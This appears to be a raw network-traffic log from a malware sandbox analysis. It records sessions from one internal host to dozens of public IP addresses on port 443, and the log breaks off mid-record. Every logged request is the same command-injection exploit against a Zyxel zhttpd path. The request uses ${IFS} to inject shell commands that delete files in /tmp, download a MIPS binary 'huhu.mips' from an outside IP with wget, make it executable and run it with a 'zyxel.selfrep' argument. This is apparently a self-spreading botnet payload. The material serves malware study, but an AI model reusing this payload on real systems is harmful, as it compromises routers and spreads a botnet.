                                            Feb 2, 2024 06:20:24.165277004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            278192.168.2.155445293.176.223.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165307999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            279192.168.2.155942036.210.143.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165317059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            280192.168.2.1555696110.90.1.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165333986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            281192.168.2.1559776159.82.171.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165365934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            282192.168.2.1549158172.154.52.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165410995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            283192.168.2.1542344119.217.75.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165426016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            284192.168.2.155317465.211.42.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165441990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            285192.168.2.155883039.186.160.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165466070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            286192.168.2.153315446.183.150.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165503025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            287192.168.2.1547196102.64.4.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165534019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            288192.168.2.155702685.100.174.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165559053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            289192.168.2.154347420.10.112.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165600061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            290192.168.2.153727234.231.251.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165616035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            291192.168.2.1534934188.174.48.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165642977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            292192.168.2.1558662151.70.216.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165687084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            293192.168.2.1543064176.167.62.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165709972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            294192.168.2.1547422163.134.78.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165725946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            295192.168.2.1543772145.44.187.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165760040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            296192.168.2.153364613.19.188.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165793896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            297192.168.2.15571128.69.113.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165823936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            298192.168.2.155617457.164.227.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165842056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            299192.168.2.155363643.126.254.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165883064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            300192.168.2.1552002116.171.50.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165904045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            301192.168.2.1546328174.148.54.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165935993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            302192.168.2.1543572139.116.57.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.165951967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            303192.168.2.154652236.108.33.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:24.166004896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            304192.168.2.1544188192.194.255.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196594954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            305192.168.2.1533796203.15.3.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196644068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            306192.168.2.1549772169.8.141.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196680069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            307192.168.2.1556738106.161.170.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196695089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            308192.168.2.1547006195.185.101.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196743965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            309192.168.2.1547750200.89.72.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196751118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            310192.168.2.1556708157.65.112.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196775913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            311192.168.2.1543018180.225.225.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196779966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            312192.168.2.1535504132.61.56.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196825027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            313192.168.2.155280238.21.227.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196872950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            314192.168.2.155334097.197.223.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196897984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            315192.168.2.1534378121.81.234.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196929932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            316192.168.2.155522096.169.193.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196933985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            317192.168.2.1557890223.80.188.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196974039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            318192.168.2.1546702145.5.131.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.196985960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            319192.168.2.1547010156.221.221.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197015047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            320192.168.2.1551492202.110.53.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197053909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            321192.168.2.1543710119.237.132.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197066069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            322192.168.2.15479461.9.154.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197089911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            323192.168.2.1554166117.90.107.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197149992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            324192.168.2.1551058208.192.219.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197150946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            325192.168.2.154813064.135.134.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197150946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            326192.168.2.154621037.145.84.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197181940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            327192.168.2.154662071.226.26.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197211981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            328192.168.2.1557138119.243.86.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197257996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            329192.168.2.1537500114.232.4.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197278023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            330192.168.2.1547748190.205.197.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197288036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            331192.168.2.153644489.5.164.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197330952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            332192.168.2.155503824.178.242.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197360039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            333192.168.2.1555324218.140.2.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197360039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            334192.168.2.1545180136.224.9.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197398901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            335192.168.2.1536344142.21.92.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197419882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            336192.168.2.1540918178.129.246.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197448015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            337192.168.2.1560582170.141.238.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197474957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            338192.168.2.1546010212.31.96.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197511911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            339192.168.2.1555390198.66.129.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197537899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            340192.168.2.154794458.133.36.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197573900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            341192.168.2.1535388137.108.55.218443
                                            TimestampBytes transferredDirectionData
